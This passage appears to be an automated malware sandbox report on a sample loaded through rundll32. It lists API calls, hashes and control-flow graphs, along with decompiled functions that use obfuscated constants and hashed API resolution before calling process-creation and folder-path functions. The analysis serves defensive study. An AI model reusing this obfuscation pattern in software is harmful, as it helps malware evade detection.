                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00657A60), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00657A60), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563850517.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563838910.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563924803.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563954086.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563968854.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563980975.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001B7F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 275 1b7f5d-1b7ff1 call 1c20b9 call 1caa30 CreateProcessW
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,001BAD99,?,?,?,181C8C04,001BAD99), ref: 001B7FEB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction ID: a86c8ab35bad83d7a7cb8abbb095f3e0bc31636ac63a4d2043a8c11661d562fa
                                                                                                                      • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                      • Instruction Fuzzy Hash: BD11D372402128BBDF629F91DD09CEF7F79EF193A4F549144FA1921121D3728A60EBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001C46BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 1c46bb-1c473b call 1c20b9 call 1caa30 SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001C46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E001C20B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E001CAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                      0x001c46d5
                                                                                                                      0x001c46da
                                                                                                                      0x001c46e4
                                                                                                                      0x001c46ec
                                                                                                                      0x001c46f3
                                                                                                                      0x001c46f7
                                                                                                                      0x001c46fe
                                                                                                                      0x001c4705
                                                                                                                      0x001c470c
                                                                                                                      0x001c4724
                                                                                                                      0x001c4735
                                                                                                                      0x001c473b

                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 001C4735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1514166925-0
                                                                                                                      • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction ID: 2d3cbc9fc1c8f88bf3c1c50fecdbfc819674b3bb4817b4ecca3bb3e6d8c316c0
                                                                                                                      • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                      • Instruction Fuzzy Hash: 13011A75802218BBCF15AFD5DC098DFBFB8EF55394F108149F91826211D2758A60DBD1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001B93ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 285 1b93ed-1b9461 call 1caa30 ExitProcess
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E001B93ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E001CAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                      0x001b93f3
                                                                                                                      0x001b9405
                                                                                                                      0x001b9411
                                                                                                                      0x001b9412
                                                                                                                      0x001b9413
                                                                                                                      0x001b941a
                                                                                                                      0x001b9421
                                                                                                                      0x001b9428
                                                                                                                      0x001b9433
                                                                                                                      0x001b9436
                                                                                                                      0x001b943d
                                                                                                                      0x001b9444
                                                                                                                      0x001b9451
                                                                                                                      0x001b945b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 001B945B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction ID: 7ded739a77acca7f0f3f54e6a463ef4169227bf96d911c5dc6473abc52285046
                                                                                                                      • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                      • Instruction Fuzzy Hash: FBF03C7190130CFBEB04DBE8DA46A9DFBB4EB50314F2081A9D604B3261E7B05F459A91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001BB23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 305 1bb23c-1bb2c6 call 1c20b9 call 1caa30 lstrcmpiW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001BB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C20B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E001CAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                      0x001bb23f
                                                                                                                      0x001bb240
                                                                                                                      0x001bb241
                                                                                                                      0x001bb244
                                                                                                                      0x001bb247
                                                                                                                      0x001bb24a
                                                                                                                      0x001bb24e
                                                                                                                      0x001bb24f
                                                                                                                      0x001bb254
                                                                                                                      0x001bb25e
                                                                                                                      0x001bb26a
                                                                                                                      0x001bb271
                                                                                                                      0x001bb278
                                                                                                                      0x001bb27f
                                                                                                                      0x001bb286
                                                                                                                      0x001bb28d
                                                                                                                      0x001bb294
                                                                                                                      0x001bb29b
                                                                                                                      0x001bb2b3
                                                                                                                      0x001bb2c1
                                                                                                                      0x001bb2c6

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 001BB2C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.563589206.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.563579684.00000000001B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.563637304.00000000001D3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction ID: 6b78322d998bafa5638b0655cf7b4f2c03eab40b98b820dd96ba5adec3972063
                                                                                                                      • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                      • Instruction Fuzzy Hash: F7011A72C04608FFDF45DFD4DD468AEBB75EB54304F108189F90566152E3718B609B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%